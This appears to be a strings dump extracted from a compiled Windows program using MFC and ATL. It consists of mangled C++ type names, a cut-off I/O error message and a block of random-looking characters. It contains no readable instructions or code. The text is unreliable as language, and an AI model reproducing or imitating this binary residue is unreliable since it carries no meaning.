.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
.?AV?$CAtlExeModuleT@VCDummyModule@@@ATL@@
.?AV?$CAtlExeModuleT@VCDummyModule@@@ATL@@
.?AVUrlCatcher@@
.?AVUrlCatcher@@
Inappropriate I/O control opera
Inappropriate I/O control opera
XwCCA\ttH&CCdKxxb;CCG|HHJ-oozyaaE8oodSggGvll2AxxN>mmGzHHB/kkBkggP]ww1hIIMAuuZTVVx&mm2;RRoXttxSttZ]kkrKjjWzQQGzVVA5QQGkxxp0vvxjHHR[mmfaggeJSSJ3ggCmoofO33mHWWG`qqzVxxc%qqiOggd166s.SS1bjj8~QQZeVVe SSv'jjH]uu1/IIibuuZ-llW,bb3huu5euu2/661KCCznVVa1ggf/11P|QQr2LLA"SSePjj4$xxv/MMN4jjm:xx58wwGlddn1ooKfNNxiSSZgaaRInnfCww6/vvHhLLURCCG\NN2DQQr xxcmnnZ=eeJ`QQ4ZFFJ"wwKfnn30wwf400jnuud?VV1;kkw